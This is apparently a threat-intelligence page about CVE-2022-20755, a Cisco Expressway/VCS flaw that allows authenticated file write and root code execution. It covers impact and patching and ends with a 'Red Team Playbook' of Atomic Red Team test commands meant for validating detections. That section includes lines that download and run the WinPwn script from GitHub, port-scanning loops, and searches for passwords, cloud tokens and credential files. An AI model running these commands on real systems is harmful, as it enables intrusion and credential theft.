CVE-2022-20755
Overview
This vulnerability stems from improper input validation and insufficient access controls within the API and web-based management interfaces of Cisco TelePresence Video Communication Server (VCS) Expressway. Specifically, the affected components permit authenticated users with read/write privileges to manipulate file operations, enabling arbitrary file write and command execution on the underlying operating system. The root cause lies in the handling of user-supplied data that is not adequately sanitized before being processed by system-level functions, affecting the Expressway feature set of the VCS product.
Vulnerability Description
Multiple vulnerabilities in the API and web-based management interfaces of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read/write privileges to the application to write files or execute arbitrary code on the underlying operating system of an affected device as the root user. For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An attacker with authenticated, high-privilege access can execute arbitrary code on the device’s underlying operating system with root-level permissions, enabling full system compromise. This includes the ability to modify system files, install persistent malware, or disrupt service availability. The attack requires network access and valid credentials with read/write privileges, as indicated by the CVSS vector (PR:H). Successful exploitation can lead to complete control over the affected device, facilitating lateral movement within the network and potential data exfiltration.
Solution
Cisco has released security updates addressing these vulnerabilities in the Cisco TelePresence VCS Expressway product line. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-expressway-filewrite-87Q5YRk. The advisory provides specific version updates and upgrade instructions to remediate the issue. No alternative workarounds are specified; therefore, timely application of the vendor-provided patches is essential to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the API and web-based management interfaces of the Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) is characterized by multiple weaknesses that allow an authenticated remote attacker with read/write privileges to manipulate files or execute arbitrary code on the underlying operating system with root access. This situation arises from improper handling of user input and insufficient validation mechanisms within the management interfaces, which can be exploited to gain elevated privileges. The implications of such vulnerabilities are severe, as they can lead to unauthorized access to sensitive data, disruption of services, and potential compromise of the entire system.
Attack vectors for this vulnerability primarily involve authenticated users who possess read/write privileges. An attacker could leverage their access to upload malicious files or scripts through the management interface. Once executed, these scripts could facilitate a range of malicious activities, including data exfiltration, installation of backdoors, or even complete system takeover. The risk is exacerbated in environments where the management interfaces are exposed to the internet or less secure networks, allowing attackers to exploit these vulnerabilities remotely. Furthermore, the ability to execute arbitrary code as the root user means that the attacker could manipulate critical system processes, potentially leading to service outages or degradation of performance.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Cisco's video communication solutions for critical business operations. The potential for unauthorized access to sensitive communications and data could result in severe reputational damage, loss of customer trust, and financial repercussions. Additionally, the exploitation of such vulnerabilities could lead to regulatory compliance issues, especially for organizations in sectors that handle sensitive information, such as healthcare or finance. The ability to execute arbitrary code also raises concerns about the integrity of the systems, as attackers could introduce malware or other malicious components that could persist even after initial remediation efforts.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected systems is crucial to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Implementing strict access controls and limiting user privileges can significantly reduce the attack surface. Monitoring logs for unusual activity or unauthorized access attempts can also help in early detection of exploitation attempts. Furthermore, organizations should consider deploying intrusion detection systems (IDS) to monitor for signs of malicious activity and ensure that incident response plans are in place to address any potential breaches swiftly.
In conclusion, the vulnerabilities in the Cisco Expressway Series and TelePresence VCS pose a serious threat to organizations utilizing these systems. The potential for remote exploitation by authenticated users with elevated privileges necessitates immediate attention to security practices and policies. By understanding the technical details, attack vectors, and real-world implications of these vulnerabilities, organizations can better prepare themselves to defend against potential threats and mitigate the associated risks effectively.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-20755, with our telemetry indicating multiple new sightings of exploitation attempts targeting the Cisco Expressway Series and TelePresence VCS. Although the EPSS score remains stable, this surge in observed activity signals increased adversary interest and potential operationalization of these vulnerabilities. The absence of new exploit details suggests that threat actors may be conducting reconnaissance or limited testing prior to broader exploitation campaigns. For defenders, this development underscores the urgency of heightened monitoring and reinforces the likelihood that these vulnerabilities could be leveraged in targeted intrusions. Consequently, while the overall risk rating remains high, the recent uptick in exploitation attempts elevates the immediacy of the threat and warrants close attention to related detection and response measures.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Telepresence Video Communication Server | All |
cpe:2.3:a:cisco:telepresence_video_communication_server:*:*:*:*:expressway:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-139 | Relative Path Traversal |
50%
|
High | High | |
| CAPEC-76 | Manipulating Web Input to File System Calls |
37%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20755 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk |